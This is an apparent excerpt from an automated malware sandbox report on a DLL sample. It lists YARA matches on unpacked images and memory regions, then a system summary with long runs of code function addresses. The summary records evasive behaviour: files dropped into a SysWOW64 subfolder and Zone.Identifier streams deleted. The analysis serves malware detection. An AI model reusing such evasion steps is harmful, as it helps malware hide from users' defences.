                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2810000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.33f3568.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2c60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2fd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.3d0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3310000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.743608.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2b90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.34a3590.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2d13590.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.582902080.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.583952569.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.582956002.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.584098715.000000000348A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516939177.0000000002A69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.583809959.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.609571158.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.584033877.0000000003310000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.608882072.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.529764323.00000000033DA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.529712729.0000000002FD0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.689618667.0000000002E43000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.648560636.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.608527561.00000000003D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.689328913.0000000002B90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.610069085.000000000073C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.591122734.0000000002C60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.591237102.0000000002CFA000.00000004.00000020.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: mal2.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7004 -ip 7004
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Uikrpc\tumwlrzamddm.oli:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Uikrpc\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003EED950_2_003EED95
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003ECC3F0_2_003ECC3F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D3E3B0_2_003D3E3B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E0A370_2_003E0A37
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E08240_2_003E0824
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003EBA180_2_003EBA18
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F2C160_2_003F2C16
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E1C120_2_003E1C12
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DF20D0_2_003DF20D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003EE4780_2_003EE478
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F1C710_2_003F1C71
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F0C660_2_003F0C66
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E645F0_2_003E645F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E604E0_2_003E604E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E3ABE0_2_003E3ABE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003EB0BA0_2_003EB0BA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DAEB90_2_003DAEB9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D68AD0_2_003D68AD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E56A90_2_003E56A9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DF4A50_2_003DF4A5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E04A40_2_003E04A4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DF6990_2_003DF699
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DD8990_2_003DD899
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DC69B0_2_003DC69B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D30850_2_003D3085
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DE6FD0_2_003DE6FD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F20F80_2_003F20F8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DBEF50_2_003DBEF5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F06EF0_2_003F06EF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DA8E80_2_003DA8E8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E7EDD0_2_003E7EDD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F0AD30_2_003F0AD3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D54C00_2_003D54C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D77390_2_003D7739
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E473A0_2_003E473A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DE3360_2_003DE336
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E31300_2_003E3130
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003ECF2C0_2_003ECF2C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DB12E0_2_003DB12E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D61250_2_003D6125
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E85180_2_003E8518
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D53140_2_003D5314
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D47160_2_003D4716
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D81120_2_003D8112
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E710D0_2_003E710D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003ED10B0_2_003ED10B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F33060_2_003F3306
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D597D0_2_003D597D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D2B7C0_2_003D2B7C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E5B7C0_2_003E5B7C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D25750_2_003D2575
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D21760_2_003D2176
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003EC7720_2_003EC772
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D196D0_2_003D196D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D996C0_2_003D996C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D95650_2_003D9565
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D51660_2_003D5166
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DDD660_2_003DDD66
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003EF5610_2_003EF561
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F25600_2_003F2560
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D635F0_2_003D635F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D8D590_2_003D8D59
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F2D4F0_2_003F2D4F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F314A0_2_003F314A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003EC1450_2_003EC145
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D4F420_2_003D4F42
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D33A90_2_003D33A9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E77A70_2_003E77A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003EBFA10_2_003EBFA1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E6B910_2_003E6B91
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D938F0_2_003D938F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F19870_2_003F1987
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DF9840_2_003DF984
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D7D870_2_003D7D87
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003ED5FE0_2_003ED5FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D6BFE0_2_003D6BFE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D1DF90_2_003D1DF9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E91F70_2_003E91F7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DB7EC0_2_003DB7EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003DFBEF0_2_003DFBEF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003F35E30_2_003F35E3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003EE7DA0_2_003EE7DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E89DA0_2_003E89DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E13DB0_2_003E13DB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D2DC50_2_003D2DC5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E4DC50_2_003E4DC5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003E0FC50_2_003E0FC5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D5DC30_2_003D5DC3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D39C30_2_003D39C3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9D5EA00_2_6E9D5EA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9DA6D00_2_6E9DA6D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9DE6E00_2_6E9DE6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9D66E00_2_6E9D66E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9E0F100_2_6E9E0F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9D1C100_2_6E9D1C10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9D75F40_2_6E9D75F4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9D9D500_2_6E9D9D50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9F0A610_2_6E9F0A61
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9DD3800_2_6E9DD380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9D38C00_2_6E9D38C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E9E01D00_2_6E9E01D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028256A93_2_028256A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281AEB93_2_0281AEB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028306EF3_2_028306EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282BA183_2_0282BA18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282604E3_2_0282604E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282ED953_2_0282ED95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028289DA3_2_028289DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282E7DA3_2_0282E7DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028299023_2_02829902
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028181123_2_02818112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028153143_2_02815314
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028231303_2_02823130
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02818D593_2_02818D59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281196D3_2_0281196D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02812B7C3_2_02812B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028130853_2_02813085
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281F6993_2_0281F699
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281D8993_2_0281D899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281C69B3_2_0281C69B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281F4A53_2_0281F4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028204A43_2_028204A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028168AD3_2_028168AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02823ABE3_2_02823ABE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028154C03_2_028154C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02830AD33_2_02830AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02827EDD3_2_02827EDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281A8E83_2_0281A8E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281BEF53_2_0281BEF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028320F83_2_028320F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281E6FD3_2_0281E6FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281F20D3_2_0281F20D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02821C123_2_02821C12
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02832C163_2_02832C16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028208243_2_02820824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02820A373_2_02820A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282CC3F3_2_0282CC3F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02830C663_2_02830C66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02831C713_2_02831C71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282E4783_2_0282E478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028319873_2_02831987
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281F9843_2_0281F984
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02817D873_2_02817D87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281938F3_2_0281938F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02826B913_2_02826B91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282BFA13_2_0282BFA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028277A73_2_028277A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028133A93_2_028133A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02813FAF3_2_02813FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028139C33_2_028139C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02815DC33_2_02815DC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02812DC53_2_02812DC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02820FC53_2_02820FC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02824DC53_2_02824DC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281A3D43_2_0281A3D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028213DB3_2_028213DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028335E33_2_028335E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028147E43_2_028147E4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281B7EC3_2_0281B7EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281FBEF3_2_0281FBEF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02811DF93_2_02811DF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282D5FE3_2_0282D5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02816BFE3_2_02816BFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028333063_2_02833306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282D10B3_2_0282D10B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028251093_2_02825109
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282670F3_2_0282670F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282710D3_2_0282710D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028285183_2_02828518
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028161253_2_02816125
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282CF2C3_2_0282CF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281B12E3_2_0281B12E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281E3363_2_0281E336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282473A3_2_0282473A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028177393_2_02817739
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02814F423_2_02814F42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282C1453_2_0282C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0283314A3_2_0283314A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02832D4F3_2_02832D4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281635F3_2_0281635F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282F5613_2_0282F561
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028325603_2_02832560
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028195653_2_02819565
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281DD663_2_0281DD66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028151663_2_02815166
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0282C7723_2_0282C772
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028125753_2_02812575
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028121763_2_02812176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0281597D3_2_0281597D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02825B7C3_2_02825B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9D5EA03_2_6E9D5EA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9DA6D03_2_6E9DA6D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9DE6E03_2_6E9DE6E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9D66E03_2_6E9D66E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9E0F103_2_6E9E0F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9D1C103_2_6E9D1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9D75F43_2_6E9D75F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9D9D503_2_6E9D9D50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9F0A613_2_6E9F0A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9DD3803_2_6E9DD380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9D38C03_2_6E9D38C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9E01D03_2_6E9E01D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF06EF4_2_02FF06EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FEED954_2_02FEED95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDE6FD4_2_02FDE6FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF20F84_2_02FF20F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDBEF54_2_02FDBEF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDA8E84_2_02FDA8E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE7EDD4_2_02FE7EDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF0AD34_2_02FF0AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD54C04_2_02FD54C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE3ABE4_2_02FE3ABE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDAEB94_2_02FDAEB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD68AD4_2_02FD68AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE56A94_2_02FE56A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDF4A54_2_02FDF4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE04A44_2_02FE04A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDF6994_2_02FDF699
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDD8994_2_02FDD899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDC69B4_2_02FDC69B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD30854_2_02FD3085
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FEE4784_2_02FEE478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF1C714_2_02FF1C71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF0C664_2_02FF0C66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE604E4_2_02FE604E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FECC3F4_2_02FECC3F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE0A374_2_02FE0A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE08244_2_02FE0824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FEBA184_2_02FEBA18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF2C164_2_02FF2C16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE1C124_2_02FE1C12
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDF20D4_2_02FDF20D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FED5FE4_2_02FED5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD6BFE4_2_02FD6BFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD1DF94_2_02FD1DF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDB7EC4_2_02FDB7EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDFBEF4_2_02FDFBEF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD47E44_2_02FD47E4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF35E34_2_02FF35E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE89DA4_2_02FE89DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FEE7DA4_2_02FEE7DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE13DB4_2_02FE13DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDA3D44_2_02FDA3D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD2DC54_2_02FD2DC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE0FC54_2_02FE0FC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD39C34_2_02FD39C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD5DC34_2_02FD5DC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD3FAF4_2_02FD3FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD33A94_2_02FD33A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE77A74_2_02FE77A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FEBFA14_2_02FEBFA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE6B914_2_02FE6B91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD938F4_2_02FD938F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF19874_2_02FF1987
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDF9844_2_02FDF984
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD7D874_2_02FD7D87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD597D4_2_02FD597D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD2B7C4_2_02FD2B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE5B7C4_2_02FE5B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD25754_2_02FD2575
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD21764_2_02FD2176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FEC7724_2_02FEC772
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD196D4_2_02FD196D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD95654_2_02FD9565
